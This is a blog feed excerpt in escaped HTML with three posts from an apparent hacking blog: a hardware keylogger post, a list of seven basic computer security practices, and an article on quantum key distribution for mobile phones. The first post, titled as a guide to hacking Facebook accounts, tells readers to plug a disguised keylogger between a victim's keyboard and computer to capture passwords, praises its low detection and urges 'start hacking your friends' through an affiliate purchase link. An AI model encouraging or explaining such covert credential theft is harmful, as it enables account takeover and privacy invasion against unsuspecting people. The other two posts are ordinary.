&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://www.blogger.com/null" name="more"&gt;&lt;/a&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Hardware Keyloggers&lt;/span&gt;&lt;/b&gt;&amp;nbsp;are used for &lt;span style="color: blue; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;keystroke &lt;/span&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;logging&lt;/span&gt;&lt;/span&gt;, a method of capturing and recording computer &lt;span style="color: blue; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="background-color: transparent; border-bottom: 1px solid blue; color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;user &lt;/span&gt;&lt;span class="kLink" style="background-color: transparent; border-bottom: 1px solid blue; color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;keystrokes&lt;/span&gt;&lt;/span&gt;. They plug in between a computer keyboard and a computer and log all&lt;b&gt; keyboard activity&lt;/b&gt; to an &lt;b&gt;internal memory&lt;/b&gt;. They are&amp;nbsp;designed to work with PS/2 keyboards, and more&amp;nbsp;recently with USB keyboards.&lt;/span&gt;
&lt;br /&gt;
&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;
&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
A hardware keylogger looks like a normal &lt;b&gt;USB drive&lt;/b&gt; or any other computer peripheral so that the victim can never doubt that it is a keylogger, So by looking at it’s &lt;b&gt;appearance&lt;/b&gt; it is impossible to identify it as a keylogger., Here is how a hardware keylogger may look like&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp_hUBO4K6qiwfdvVXeqKdYzIkEH8zCfcYV7CxRKjDpHWVAHVOb9p1zAfqeqHGS1fgz60tEnQTl9ZYs_6ihh7qr6sGtNygoX46omgBcwIX6uAjNUC89NwRa6qdGBhLUNCMxvJ9T-2A-E/s1600/hardware_keyloggers.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp_hUBO4K6qiwfdvVXeqKdYzIkEH8zCfcYV7CxRKjDpHWVAHVOb9p1zAfqeqHGS1fgz60tEnQTl9ZYs_6ihh7qr6sGtNygoX46omgBcwIX6uAjNUC89NwRa6qdGBhLUNCMxvJ9T-2A-E/s400/hardware_keyloggers.jpg" width="400" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;span class="note"&gt;How To Use HardWare&amp;nbsp;Key logger to Hack Facebook account?&lt;/span&gt;&lt;br /&gt;
Installation of a Hardware&amp;nbsp;key logger&amp;nbsp;is very easy,&amp;nbsp;Simply plug the&amp;nbsp;Hardware keylogger&amp;nbsp;in between the &lt;b&gt;USB keyboard&lt;/b&gt; and the &lt;b&gt;USB port&lt;/b&gt;.&lt;span class="Apple-style-span" style="line-height: 24px;"&gt;&lt;span class="Apple-style-span"&gt;The following image shows how a keylogger is installed&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: 14px; line-height: 24px;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: 14px; line-height: 24px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIoFc0a_5GbOVjA0TTCxLkxqPcII6Qevs0R2wKsTwDIzB_X7YsTW79MSmq6W4AH8hd-qLWKWTHOGnWxxyrGe2b7ub_Kot4YEUw6au7H2EDgxnay1U1HCH5gmguhUOGq33T7TTXVNK7BHk/s1600/using_keylogger2.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIoFc0a_5GbOVjA0TTCxLkxqPcII6Qevs0R2wKsTwDIzB_X7YsTW79MSmq6W4AH8hd-qLWKWTHOGnWxxyrGe2b7ub_Kot4YEUw6au7H2EDgxnay1U1HCH5gmguhUOGq33T7TTXVNK7BHk/s1600/using_keylogger2.gif" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Once installed the keylogger starts recording each and every keystroke of the keyboard including &lt;span style="color: blue; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;email &lt;/span&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;passwords&lt;/span&gt;&lt;/span&gt; and other confidential information.and stores them in separate log files as shown&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYagz7QY5P3nJjbM-wVMDu0WMYXobrMPxf94vMeGq2HsHVpljZjXs8VUvCNuIVNi07oWKTKPJne1b0SXkCpQilrDcKX5tHkkv-rj1gU3Fi4wDr8DQOFHu5pFxd5imjWUatXcXBrhTNNb8/s1600/timestamp.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYagz7QY5P3nJjbM-wVMDu0WMYXobrMPxf94vMeGq2HsHVpljZjXs8VUvCNuIVNi07oWKTKPJne1b0SXkCpQilrDcKX5tHkkv-rj1gU3Fi4wDr8DQOFHu5pFxd5imjWUatXcXBrhTNNb8/s320/timestamp.gif" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Thus a hacker can use the information stored in a Hardware&amp;nbsp;key logger&amp;nbsp;to hack&amp;nbsp;Face book&amp;nbsp;or any other&amp;nbsp;email account&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="note"&gt;Which is the Best&amp;nbsp;Hardware&amp;nbsp;Keylogger &amp;nbsp;?&lt;/span&gt;&lt;br /&gt;
With my experience of more than 4 years in the field of &amp;nbsp;Hacking and 
security I suggest only one Hardware key logger&amp;nbsp;KeyCobra Hardware 
Keylogger&amp;nbsp;which I think is best and has a very low antivirus detection&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxhOjWnNDP7WkCk3HEZl3jsewUuvOe6bYTlBXOihFc0gAuqU5qkufIdAWtnDwyVh7FTGUfHhLGezDYXATQCU2ZQykBPQmUHx_tdbk64glgCXoQH7tAfqB4C7gL2tPN-ok6f2SY-IqE1JE/s1600/KC-bxr.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxhOjWnNDP7WkCk3HEZl3jsewUuvOe6bYTlBXOihFc0gAuqU5qkufIdAWtnDwyVh7FTGUfHhLGezDYXATQCU2ZQykBPQmUHx_tdbk64glgCXoQH7tAfqB4C7gL2tPN-ok6f2SY-IqE1JE/s1600/KC-bxr.jpg" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;KeyCobra Hardware Keylogger&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
KeyCobra is the world's smallest and smartest USB hardware keylogger. 
The KeyCobraUSB keyboard logger comes in a standard version (4MB memory 
capacity which can capture &amp;nbsp;2,000,000 keystrokes - over 1,000 pages of 
text), and a Venom Version (2GB memory capacity -which can 
capture&amp;nbsp;billion keystrokes - over 1 million pages of text), &amp;nbsp;Its 
Completely invisible for computer operation, &amp;nbsp;It is also &amp;nbsp;compatible 
with Mac.&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=2538146&amp;amp;referrer=hackhaholic" rel="nofollow"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
So what are you waiting for, Grab a &lt;b&gt;KeyCobra Hardware Keylogger&lt;/b&gt;, and start hacking your friends ,You Can Buy a KeyCobra Hardware Keylogger &amp;nbsp;From the Following Link&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue; font-size: medium;"&gt;&lt;a href="https://www.plimus.com/jsp/redirect.jsp?contractId=2538146&amp;amp;referrer=hackhaholic" rel="nofollow"&gt;Buy&amp;nbsp;KeyCobra Hardware Keylogger&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
&lt;br /&gt;
If you any doubts&amp;nbsp;regarding&amp;nbsp;the article , please fell free to post a comment&lt;/span&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibp_hUBO4K6qiwfdvVXeqKdYzIkEH8zCfcYV7CxRKjDpHWVAHVOb9p1zAfqeqHGS1fgz60tEnQTl9ZYs_6ihh7qr6sGtNygoX46omgBcwIX6uAjNUC89NwRa6qdGBhLUNCMxvJ9T-2A-E/s72-c/hardware_keyloggers.jpg" width="72"/></item><item><title>Must know About Mandatory 7 Computer Security Protocols</title><link>http://superhackings.blogspot.com/2015/08/must-know-about-mandatory-7-computer.html</link><category>Articles</category><category>Computer Security</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 00:45:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-6755627766799947720</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJggphQR4Y7QKSCqe4ta21M9IDq7obYRMv_6zrApEHlXGmToKGY-r0t0R9SIctDmqmLant6vELt-NWTy5I5G_HMiv0BLHlUH61XPbMtBCHkoJ7LAFiaLhLG7GjXrtVyZuhToX2U4gu1B0/s1600/hacker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJggphQR4Y7QKSCqe4ta21M9IDq7obYRMv_6zrApEHlXGmToKGY-r0t0R9SIctDmqmLant6vELt-NWTy5I5G_HMiv0BLHlUH61XPbMtBCHkoJ7LAFiaLhLG7GjXrtVyZuhToX2U4gu1B0/s1600/hacker.jpg" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Computer security entails protecting of the computer and the computer 
software from data loss, destruction and authorized access. There are 
several computer protocols put in place to ensure that chances of above 
mentioned are reduced or totally eliminated, they include practices 
carried out or installation of certain software or programs on the 
computer to enable and improve security.&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://www.blogger.com/null" name="more"&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Among the 7 computer security protocols that should be mandatory are&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: #cc0000;"&gt;&lt;b&gt;1. Using certified genuine Operating Systems &lt;/b&gt;&lt;/span&gt;-
 to ensure that your computer is secure from data loss, possible damage 
and software malfunctions ensure that you purchase and use the genuine 
operating systems. Always desist from installing any software that 
cannot be trusted.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;2. Protecting home and private computers &lt;/span&gt;&lt;/b&gt;–
 always ensure that your Personal computers are adequately protected to 
eliminate possible risk. Always lock your screens wherever you leave 
your computer be it at home or in the office. You should also ensure 
that you make use of available anti – virus for your computer and also 
computer software should be updated always in good time.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;3. Encrypting sensitive locally stored files&lt;/span&gt;&lt;/b&gt; - Windows Operating System usually comes with &lt;span style="font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;file &lt;/span&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;encryption&lt;/span&gt;&lt;/span&gt; features, which are usually in-built. There are other &lt;span style="font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;encryption &lt;/span&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;programs&lt;/span&gt;&lt;/span&gt;
 that can assist in encryption work such as the TrueCrypt utility among 
others. These programs easily integrate well with windows explorer.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;4. Encrypting of personal information that is stored in cloud &lt;/span&gt;&lt;/b&gt;–
 though vendors of cloud storage vendors will normally assure that the 
data you have stored in cloud is utterly safe, it’s strongly advised 
that you encrypt it to avoid it getting to the wrong hands.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: #cc0000; font-weight: bold;"&gt;5. Preventing &lt;span style="font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;Keystroke &lt;/span&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;loggers&lt;/span&gt;&lt;/span&gt; and other data snoops&amp;nbsp;&lt;/span&gt;-
 ensure that your firewall and antivirus are in good working order to 
eliminate vulnerability of your systems from computer criminals, they 
attack when there is weakness and easy access. There are so many 
antivirus software’s available online. User must choose best-rated 
antivirus software for his PC.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;6. Manual &lt;span style="font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;virus &lt;/span&gt;&lt;span class="kLink" style="font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;scanning&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
 - sometimes viruses sneak through even when there are automatic updates
 and regular malware scans, so it’s advisable to occasionally perform 
the scan manually.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;7. Destroying old data &lt;/span&gt;&lt;/b&gt;– old
 and unused data should be properly destroyed preferably using utilities
 that are erase secure. This prevents data which sometimes is sensitive 
from falling into wrong hands.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
The above 7 computer security protocols should be mandatory to ensure 
that the data and software in your computer is totally safe.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Ensure that all data is secured with strong encryptions, use genuine 
trusted software and programs and constantly update and scan your 
computer to improve on security. Keep your computer safe.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJggphQR4Y7QKSCqe4ta21M9IDq7obYRMv_6zrApEHlXGmToKGY-r0t0R9SIctDmqmLant6vELt-NWTy5I5G_HMiv0BLHlUH61XPbMtBCHkoJ7LAFiaLhLG7GjXrtVyZuhToX2U4gu1B0/s72-c/hacker.jpg" width="72"/></item><item><title>Quantum Cryptography - Security for mobile phones </title><link>http://superhackings.blogspot.com/2015/08/quantum-cryptography-security-for.html</link><category>Articles</category><category>Cryptography</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 00:37:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-1618482647618409859</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUkFwRyzCXmTiMvECZ6nwLHVQlnSazataogNgofD55xL7FkukKC36icHzK25uCiQC0VOPUNFGorRTCx6_ZZg7muhTSjZn1h8NillCMoeU1dP9YzYkBIHyEInFKpbsRLV-k6xJ_CzjfQ8s/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUkFwRyzCXmTiMvECZ6nwLHVQlnSazataogNgofD55xL7FkukKC36icHzK25uCiQC0VOPUNFGorRTCx6_ZZg7muhTSjZn1h8NillCMoeU1dP9YzYkBIHyEInFKpbsRLV-k6xJ_CzjfQ8s/s1600/images.jpg" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: medium;"&gt;M&lt;/span&gt;odern technologies have made 
cutting-edge breakthroughs in the domains of safety, security, privacy 
and confidentiality aspects of mobile devices such that increased use of
 technology of Quantum Cryptography using &amp;nbsp;&lt;b&gt;Quantum Key Distribution&lt;/b&gt;
 as ultra-high security strategy have been advocated by promoters and 
marketers of this security system for mobile devices. &amp;nbsp;Indeed the need 
for gaining and enforcing secure mobile communications underpin societal
 needs with robust security offerings are now most in demand in society 
and business settings. This is most necessary to gain cover and security
 from online frauds, attacks, threats and attacks.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Moreover, it is also necessary to infer that &lt;b&gt;QC &lt;/b&gt;is very much in 
its infancy in modern times with its implementation and enforcement 
mainly confined to bulky, expensive, highly physically tethered server 
rooms in banks and other financial institutions which, by virtue of 
being custodians of valuable public funds, resources and assets, need 
highest degree of secure, safe and protected environments. The usage of 
QC in the domains of mobile devices is indeed of recent innovations 
based on research conducted by researchers in University of Bristol, who
 have successfully demonstrated use of this technology by cutting down 
the bulky, costly resources reduced to the extent of just using a chip 
into a hand held mobile device. Simply speaking, QC employs single 
particles of light (photons) as data couriers and scheme is dependent on
 IQC (integrated quantum circuit) or chip that is crucial for adoption 
of secure quantum communication networking, which could lead to making 
of mobile devices.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Before entering into detailed aspects of QC in the domains of &lt;b&gt;&lt;span style="color: #cc0000;"&gt;QKD&lt;/span&gt;&lt;/b&gt;
 it is necessary to understand how QKD operates. In a typical example as
 shown below, it is evidenced that sender generates random stream of 
classical bits and encodes them into sequence of non orthogonal quantum 
state of light over the quantum channel. Next, the recipient performs 
certain calculations which enable him to share some data with sender’s 
bit stream upon gaining of these quantum states. Next, channels check 
these correlations and presence of high correlations is enough to 
suggest that no major eavesdropping has taken place and the evidence of 
highly secure communication is evident.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
Coming to the realms of getting &lt;b&gt;QC using QKD&lt;/b&gt; into mobile devices 
have been tried and tested by researchers in the Centre under the aegis 
of University of Bristol for Quantum Photonics in collaboration with 
Nokia. This experiment considered client-server quantum key distribution
 scheme under which lasers and detectors are situate on server side, 
accessible via telecom fibre networks to client needing only on-chip 
polarization rotator, fixed on mobile devices. The outcomes of research 
seem to be optimistic about increased usage of quantum enhanced secure 
communications between Companies and Members of public community 
equipped with mobile devices that could offer telecom-fiber tethering.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
With major breakthrough technology designing to delink QC in QKD from 
heavy, onerous and bulky tethered servers into the realms of mobile 
technology, the floodgates have opened to make optimum and greater use 
of &lt;b&gt;Quantum Cryptography &lt;/b&gt;security for mobile technology in most 
appropriate, convenient and user friendly manner, after due 
consideration and remedial actions for the threats and challenges of QC 
also.&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
